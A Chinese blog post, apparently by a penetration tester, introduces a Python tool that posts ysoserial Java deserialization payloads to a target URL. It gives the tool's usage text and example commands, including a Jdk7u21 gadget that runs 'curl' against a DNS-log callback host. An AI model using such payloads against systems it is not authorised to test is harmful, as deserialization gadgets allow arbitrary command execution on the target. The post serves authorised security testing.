SerializeVulTest

在一次灰盒测试时发现burp发POST请求时不能正确的传输序列化过后的ysoserial的payload。

虽然这里我也很奇怪，因为有的时候burp发过去是没问题，有时候就是不行的。

参考并修改了weblogic.py，通过http post方式发送ysoserial的payload。

旨在方便测试存在反序列化的点

食用姿势：

usage: SerializeVulTest.py [-h] -u URL [-j JAR] [-g GADGET] [-c COMMAND] [-m MODUL] [-f FILEPATH]

SerialVulTest

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Vul URL
  -j JAR, --jar JAR     The local Ysoserial.jar Path
  -g GADGET, --gadget GADGET
                        Ysoserial.jar Gadget, Example: URLDNS or Jdk7u21 ...
  -c COMMAND, --command COMMAND
                        Ysoserial Command, Example: http://xxxx.dnslog.cn or curl http://xxxx.dnslog.cn ...
  -m MODUL, --modul MODUL
                        1、ser：poc以读取序列化文件数据形式发送；2、cmdl：命令行模式，命令行发送序列化poc。默认为命令行模式
  -f FILEPATH, --filepath FILEPATH
                        Serialize Payload File Path: /User/xxxx/Desktop/xxx.ser
                        
  Example：
  1: python3 SerializeVulTest.py -u "http://ip:port/route" -j ysoserial.jar -g Jdk7u21 -c "curl http://dnslog"
  2: python3 SerializeVulTest.py -u "http://ip:port/route" -j ysoserial.jar -g URLDNS -c http://dnslog
  3: python3 SerializeVulTest.py -m ser -u "http://ip:port/route" -f ./test.ser

项目地址：https://github.com/Zh1z3ven/SerializeVulTest

posted @ 2021-09-03 23:35 Zh1z3ven 阅读(148) 评论(0) 编辑收藏举报

刷新页面返回顶部

Loading

Zh1z3ven

"道阻且长行则将至"

SerializeVulTest

公告

Loading

Zh1z3ven

"道阻且长 行则将至"

SerializeVulTest

公告

"道阻且长行则将至"